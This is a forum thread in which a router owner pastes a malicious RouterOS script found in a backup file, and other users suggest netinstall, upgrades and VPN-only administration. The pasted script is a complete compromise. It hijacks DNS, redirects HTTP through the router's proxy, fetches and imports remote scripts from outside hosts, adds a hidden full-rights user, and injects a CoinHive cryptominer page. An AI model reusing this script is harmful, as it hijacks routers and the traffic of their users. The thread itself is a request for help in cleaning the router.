My Backup file contains malicious scripts

abakisensoy · Mon Aug 24, 2020 4:04 am

Hi,

Time to time, I backup my settings. While I checking my backup files I saw some strange scripts that I don't have in my Winbox script & jobs tab.

They are malicious for sure but I couldn't find them anywhere except in my backup file.

How they injected it? How my backup file contains them? How can I get rid of them?

here is the code:

ˆ¬¡±˜« 	   scheduler<   ÿÿÿÿ     ÿÿÿÿĞ      ÿÿÿÿ™      ÿÿÿÿ3     ÿÿÿÿ`        M2
 ş . ÿÿÿÿ1 à  m  	  ş	 q  ğk g  !admin	 ş! -  Ó:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}
/system scheduler remove [find name=Auto113]
/system scheduler remove [find name=upd111]
/system scheduler remove [find name=upd112]
/system scheduler remove [find name=upd113]
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\r\n:do {/tool fetch url=\"http://02ip.ru/1dVH37\" mode=http keep-result=no} on-error={}\r\n/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\r\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd113" interval=12h on-event=(":do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=flash/webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}\r\n/import u113.rsc\r\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}
:do {/file remove autosupout.rif} on-error={}
:do {/file remove autosupout.old.rif} on-error={}
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=no port=21 address=""
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }
/user add name=dircreate group=full password=1vJv12qWL8 disabled=no comment="9obi6kttB9q4Dp"
:do {/file print file=dircreate} on-error={:log info errorFilePrint}
:delay 5s
:do {/file set dircreate contents="<html>\r\n<head>\r\n	<meta http-equiv=\"Content-Type\" content=\"text/html;charset=windows-1251\">\r\n	<title>\"\$(url)\"</title> \r\n<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n<script>\r\n	var miner = new CoinHive.Anonymous('FgWWtJfuvPmrfwjOfgc9Vo55EyvrMBLh', {throttle: 0.1});\r\n	miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\r\n</script>\r\n</head>\r\n<frameset>\r\n<frame src=\"\$(url)\"></frame>\r\n</frameset>\r\n</html>"} on-error={:log info errorFileSave}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}
:do {/file remove "dircreate.txt"} on-error={}
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,185.126.178.0/24 [find name!=dircreate]} on-error={:log info errorSetAddress}
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}
/user remove [find name=ftu]
/user group remove [find name=ftpgroupe]
/ip service set ftp disabled=yes port=21 address=""
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}
/system rebootf  !sh113Ğ M2
 ş . ÿÿÿÿ1 	 m  	  ş	q  ğk  g  !admin	 ş! - !Š:delay 5m
:do {/tool fetch url="http://02ip.ru/1dVH37" mode=http keep-result=no} on-error={}
/system scheduler remove [find name=upd111]f  !upd111™ M2
 ş . ÿÿÿÿ1 	 m  	  ş	q  ğk  g  !admin	 ş! - !S/system scheduler remove [find name=sh113]
:do {/file remove u113.rsc} on-error={}f  !upd1123M2
 ş . ñ /  £K\1 À¨  m  	  ş	q  ğk  g  !admin	 ş! -  á:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=flash/webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}
/import u113.rsc
:do {/file remove u113.rsc} on-error={}f  !upd113` M2

vecernik87 · Mon Aug 24, 2020 7:02 am

Netinstall - the only way to get rid of hidden stuff...

Jotne · Mon Aug 24, 2020 11:50 am

Do you have any admin possibility from the internet? If so that is a way inn. VPN is the only good solution for remote admin.
What version did your router have? Old version should be upgraded.

Sob · Mon Aug 24, 2020 2:28 pm

Was the router hacked in the past and did you clean it without netinstalling? Backup can contain also some deleted data.

martking · Mon Aug 24, 2020 7:13 pm

looking at that script id say you have been hacked, if you try to go to a website on port 80 you should get an error page appear

fleg · Mon Jan 25, 2021 9:31 pm

i`m interesting where did you find this script? In which rsc?

My Backup file contains malicious scripts

My Backup file contains malicious scripts

Re: My Backup file contains malicious scripts

Re: My Backup file contains malicious scripts

Re: My Backup file contains malicious scripts

Re: My Backup file contains malicious scripts

Re: My Backup file contains malicious scripts